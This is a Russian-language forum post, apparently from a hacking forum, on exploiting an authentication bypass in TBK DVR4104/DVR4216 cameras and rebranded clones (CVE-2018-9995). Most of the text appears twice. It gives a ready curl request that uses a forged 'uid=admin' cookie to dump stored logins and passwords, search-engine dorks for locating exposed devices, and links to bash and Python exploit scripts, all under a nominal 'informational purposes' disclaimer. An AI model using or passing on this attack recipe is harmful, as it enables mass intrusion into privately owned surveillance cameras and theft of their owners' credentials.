Эксплуатация DVR камер
Серия устройств TBK DVR4104 и DVR4216, а также сторонних производителей на базе этих версий уязвимы к обходу проверки подлинности и
с помощью простого заголовка Cookie: uid = admin можно извлекать учетные данные. Главная проблема заключается не в уязвимости, в подобном оборудовании, они довольно примитивны, а в большом количестве камер подключенных к сети. TBK предлагает множество версий оборудования с цифровым лейблом и ребрендингом оборудования IoT DVR. Многие бренды и интернет-продавцы рекламируют устройства под разными именами, и для некоторых пользователей их может быть сложно обновить.
Проэксплуатировать уязвимость можно отправив запрос:
В ответе вы получите заветные логи и пароль.
Найти камеры можно по доркам:
inurl: login.rsp
intitle: ‘DVR Login’
html: ‘/login.rsp’
‘Server: GNU rsp/1.1’
Для просмотра видео необходим IE с установленным плагином DVR.
Сплойты на bash, python
github.com
github.com
Статья представлена исключительно в ознакомительных целях, ни одна ссылка не является рекламой.
Серия устройств TBK DVR4104 и DVR4216, а также сторонних производителей на базе этих версий уязвимы к обходу проверки подлинности и
с помощью простого заголовка Cookie: uid = admin можно извлекать учетные данные. Главная проблема заключается не в уязвимости, в подобном оборудовании, они довольно примитивны, а в большом количестве камер подключенных к сети. TBK предлагает множество версий оборудования с цифровым лейблом и ребрендингом оборудования IoT DVR. Многие бренды и интернет-продавцы рекламируют устройства под разными именами, и для некоторых пользователей их может быть сложно обновить.
Проэксплуатировать уязвимость можно отправив запрос:
curl "[URL]http://target/device.rsp?opt=user&cmd=list[/URL]" -H "Cookie: uid=admin"
В ответе вы получите заветные логи и пароль.
Найти камеры можно по доркам:
inurl: login.rsp
intitle: ‘DVR Login’
html: ‘/login.rsp’
‘Server: GNU rsp/1.1’
Для просмотра видео необходим IE с установленным плагином DVR.
Сплойты на bash, python
GitHub - Cyb0r9/DVR-Exploiter: DVR-Exploiter a Bash Script Program Exploit The DVR's Based on CVE-2018-9995
DVR-Exploiter a Bash Script Program Exploit The DVR's Based on CVE-2018-9995 - Cyb0r9/DVR-Exploiter
github.com
GitHub - ezelf/CVE-2018-9995_dvr_credentials: (CVE-2018-9995) Get DVR Credentials
(CVE-2018-9995) Get DVR Credentials. Contribute to ezelf/CVE-2018-9995_dvr_credentials development by creating an account on GitHub.
github.com
Статья представлена исключительно в ознакомительных целях, ни одна ссылка не является рекламой.
Последнее редактирование:
